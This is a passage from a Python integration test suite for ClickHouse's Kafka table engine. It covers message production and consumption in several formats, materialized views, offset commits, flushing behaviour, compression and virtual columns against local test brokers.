CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that the materialized view works properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "recreate_kafka_table"
kafka_create_topic(admin_client, topic_name, num_partitions=6)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
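# Wait until each of the 6 consumers has committed an offset for the first batch of messages.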
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
"""
Regression test for UB in snappy-c (which is used in librdkafka);
the backport PR is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should be duplicated messages.
Original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
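# Produce the same messages into one topic per compression type and check that they are read back intact.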
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages of ~100 KB each
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
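# Wait until the 'flush' consumer group has committed offsets for all produced messages.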
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# retain messages indefinitely (retention.ms = -1), since a predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt1", config=topic_config)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# unlimited retention (retention.ms = -1), since predefined timestamp_ms values are used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_commit_on_select = 1,
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# unlimited retention (retention.ms = -1), since predefined timestamp_ms values are used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2_0", num_partitions=2, config=topic_config)
kafka_create_topic(admin_client, "virt2_1", num_partitions=2, config=topic_config)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
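# repetitions=4: two topics with two partitions each, and every partition received exactly
# two messages, so "Committed offset 2" should presumably appear once per partition.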
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
# members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
# members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, "virt2_0")
kafka_delete_topic(admin_client, "virt2_1")
instance.rotate_logs()
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert3"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_insert_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# unlimited retention (retention.ms = -1), since predefined timestamp_ms values are used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "avro1", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro1',
kafka_group_name = 'avro1',
kafka_commit_on_select = 1,
kafka_format = 'Avro';
''')
instance.query("INSERT INTO test.kafka select number*10 as key, number*100 as value, 1636505534 as _timestamp from numbers(4) SETTINGS output_format_avro_rows_in_file = 2, output_format_avro_codec = 'deflate'")
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'avro1', needDecode=False, timestamp=1636505534))
if len(messages) == 2:
break
result = ''
for a_message in messages:
result += decode_avro(a_message) + '\n'
expected_result = """{'key': 0, 'value': 0, '_timestamp': 1636505534}
{'key': 10, 'value': 100, '_timestamp': 1636505534}
{'key': 20, 'value': 200, '_timestamp': 1636505534}
{'key': 30, 'value': 300, '_timestamp': 1636505534}
"""
assert (result == expected_result)
def test_kafka_produce_consume_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert_avro"
kafka_create_topic(admin_client, topic_name)
num_rows = 75
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_writer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer select number*10 as key, number*100 as value from numbers({num_rows}) SETTINGS output_format_avro_rows_in_file = 7".format(num_rows=num_rows))
instance.wait_for_log_line("Committed offset {offset}".format(offset=math.ceil(num_rows/7)))
expected_num_rows = instance.query("SELECT COUNT(1) FROM test.view", ignore_error=True)
assert (int(expected_num_rows) == num_rows)
expected_max_key = instance.query("SELECT max(key) FROM test.view", ignore_error=True)
assert (int(expected_max_key) == (num_rows - 1) * 10)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "flush_by_time"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = the first block should be flushed as soon as 100 rows (kafka_max_block_size) are collected,
# without waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions2"
kafka_create_topic(admin_client, topic_name, num_partitions=10)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
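# Each produced message bundles 3-9 rows while kafka_max_block_size = 211 does not align with
# those bundles, so blocks presumably get cut in the middle of a polled bulk and only part of it
# is committed at a time - which is what this test is meant to exercise.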
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONCURRENT_CONSUMERS = 11
